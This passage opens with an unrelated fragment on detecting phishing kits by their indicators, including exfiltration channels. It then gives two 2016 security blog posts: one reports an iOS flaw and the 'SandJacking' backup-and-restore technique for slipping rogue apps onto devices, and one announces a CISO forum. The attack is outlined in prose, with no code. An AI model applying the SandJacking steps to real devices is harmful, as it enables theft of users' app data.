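The benign contact form also calls `mail()` with form input, which is why that indicator alone carries a low weight: it is the combination of a credential field, an exfiltration channel and the redirect back to the real brand that marks a kit. The flagged paths then feed the normal next steps, preserving the files and access logs before cleanup and notifying the hosting provider and the impersonated brand.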

Thursday, June 2, 2016

Apple’s iOS Vulnerability Disclosed by Mi3 Security

Apple has not yet fixed a vulnerability which could allow attackers to replace legitimate apps with rogue versions without the user's knowledge. Chilik Tamir of security vendor Mi3 Security disclosed the flaw at the Hack in the Box conference in Amsterdam last week and has been told by Cupertino that it is working on a patch, although so far none has been released, according to reports. Tamir demoed a similar attack at Black Hat Asia at the end of March. Using a self-built tool dubbed 'Su-A-Cyder', he showed how an attacker could replace legitimate apps using Xcode 7, Apple's development environment: anyone can apparently obtain an Xcode 7 developer certificate with nothing more than an email address and an Apple ID. If the malicious replacement app carries the same bundle ID as the original, it could be loaded onto a victim's device, allowing an attacker to carry out a potentially wide range of malicious activities without the user's knowledge. Apple's iOS 8.3 release blocked this route by refusing app upgrades when the files do not match. However, in Amsterdam last week Tamir showed a way around that mitigation, which he calls SandJacking: an attacker with access to a victim's device initiates a backup, deletes the original app, loads the malicious replacement and then restores the device from the backup, which puts the original app's data into the rogue app's sandbox. The new app requires manual approval by the user, but this is likely to be granted since it looks identical to the original. Which mitigation tactics should CISOs and consumers alike adopt against this vulnerability? Share your comments with the Cloud and Cyber Security Center:

Wednesday, June 1, 2016

SecurityWeek CISO Forum June 1-2 at Half Moon Bay (USA)

SecurityWeek CISO Forum will take place at the beautiful Ritz-Carlton, Half Moon Bay just south of San Francisco. This invitation only, high level event will bring together security leaders to discuss, share and learn information security strategies. Select sessions include: The State of Endpoint Security, Are we at the dawn of an endpoint protection revolution, In-CISO-mnia - What Keeps Security Leaders up at Night?, Securing The Data Center, Maximizing the Value of Threat Intelligence, Playing Cyberwar Games to Win, Reporting Security and Risk Management to the Board.  Recent evidence has been found that shows a bank in the Philippines has been attacked by the group that stole US $81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam. Symantec researchers have identified three pieces of malware which were being used in limited targeted attacks against the financial industry. Symantec's Liam O'Murchu will share late breaking research and insights on these attacks. Zero-Day vulnerabilities are perhaps the number 1 priority for CISOs. “Trusted” insiders walking out the door with corporate secrets. These are just a few of the headaches today’s security leaders are faced with on a daily basis.  How valuable has the SecurityWeek CISO Forum been in equipping security professionals? Share your comments with the Cloud and Cyber Security Center: